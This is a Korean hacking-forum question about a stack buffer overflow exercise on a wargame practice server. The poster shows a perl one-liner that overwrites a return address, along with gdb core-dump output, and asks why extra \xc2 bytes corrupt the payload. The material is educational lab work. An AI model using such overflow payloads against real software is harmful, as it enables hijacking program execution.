리눅스

 3923, 5/197 회원가입  로그인  
   smile0909
   ftz 서버에서 헥사코드가 스택에 삽입되지 않아요ㅠ

http://www.hackerschool.org/HS_Boards/zboard.php?id=QNA_linux&no=4392 [복사]


간단한 BOF에 대한 강의자료를 만들기 위해서,  ftz서버의 guest계정으로 로그인하여 테스트 중인데요.
컴파일시에 걸 수 있는 옵션은 모두 건 상태이구요. (-z execstack -fno-builtin -mpreferred-stack-boundary=2)

bof공격으로 스택의 return address부분에 주소값(\x92\x83\x04\x08)을 넣으려고 하는데 안되길래..
코어덤프를 떠보니, 자꾸 \xc2\x92\xc2\x83\xc2\x04\xc2\x08와 같이, 중간에 \xc2값이 들어가고 있는 상황이네요.

char형 배열 buffer크기는 4이구요.
아래처럼 나옵니다..

[guest@ftz test]$ perl -e 'print "a"x4,"b"x4,"\x92\x83\x04\x08"' | ./test
aaaabbbb혪혘
Segmentation fault (core dumped)
[guest@ftz test]$ gdb test core.9330
GNU gdb Red Hat Linux (5.3post-0.20021129.18rh)
Copyright 2003 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB.  Type "show warranty" for details.
This GDB was configured as "i386-redhat-linux-gnu"...
Core was generated by `./test'.
Program terminated with signal 11, Segmentation fault.
Cannot access memory at address 0x400160b0
#0  0x83c292c2 in ?? ()


혹시 스택쪽에 헥사코드를 넣으면 중간에 쓰레기값이 들어가도록 의도하신건가요?
예전에는 분명히 됬던 방식인데... 이상하네요.. 작년인가 제작년인가는 분명히 ftz서버에서도 됬던 것 같은데 왜 갑자기 안되죠?ㅠㅠ

+
아래와 같이, BOF원정대 서버에서는 잘 동작합니다. (제가 guest계정을 따로 만들어뒀습니다.)
[guest@localhost test]$ perl -e 'print "a"x4,"b"x4,"\x38\x84\x04\x08"' | ./test
aaaabbbb8?
bof success!


  Hit : 2440     Date : 2015/01/23 04:38



    
3843   ftz level1 에서 질문 있습니다 도와주세요 ㅜㅠ     bg3209
03/04 2658
3842   ftz 질문     ju031230
03/02 2299
3841   I can't login with root on terminal (OS : fedora17)[6]     김병권
01/29 2586
  ftz 서버에서 헥사코드가 스택에 삽입되지 않아요ㅠ     smile0909
01/23 2439
3839   텔넷 ftz 서버 guest 비밀번호가 뭔가요[2]     쥐이
01/06 3021
3838   해커스쿨 리눅스 트레이닝에서 guest 비밀번호가 뭔가요??[1]     six6th
01/06 2935
3837   hackerschool 레드헷 리눅스9.0관련질문인데요     qotjddn6593
01/06 2206
3836   CENT OS USB 설치후 문제     ifocean
12/26 2822
3835   falcon os second 가지고 있으신 멋진분 없나요?     jungkenji
12/20 2536
3834   갑자기 생각나서 질문드리는데 스마트폰에 vmware[2]     nmy89
12/17 3447
3833   리눅스 skel이라는게 정화히머죠?[2]     kdhan16
12/17 3977
3832   kali linux를 가상머신으로 실행시켰을때 궁금한점[1]     cckcamp
12/07 3931
3831   해커스쿨강좌 멍멍이컴퓨터를찾아라에서.. ssh 포트번호알때 telnet으로[1]     alsrbdu
12/07 3216
3830   리눅스 x windows (VMware)[1]     inwoong32
11/30 2454
3829   책을 고민하고 있습니다.[2]     calliope7487
11/19 2866
3828   백트랙5 wlan0 칩셋이 Unknown으로 나타나는게 문제가 되나요?     jeah9441
11/14 2542
3827   VMware Backtrack5 USB무선랜카드 질문     jeah96
11/11 3107
3826   vi 소스 코드를 보고 싶은데요[2]     lionpoo
11/11 2593
3825   가상머신에 우분투를 깔고 ssh 설치후 가상머신 자체에서 포트포워딩과 공유기 포트포워딩에서의 문제가...     ehaakdl
11/01 2966
3824   리눅스 터미널 창 어떻게 띄우나요?[2]     cksrjfl1996
10/09 4720
[1][2][3][4] 5 [6][7][8][9][10]..[197]

Copyright 1999-2023 Zeroboard / skin by Hackerschool.org / Secure Patch by Hackerschool.org & Wowhacker.com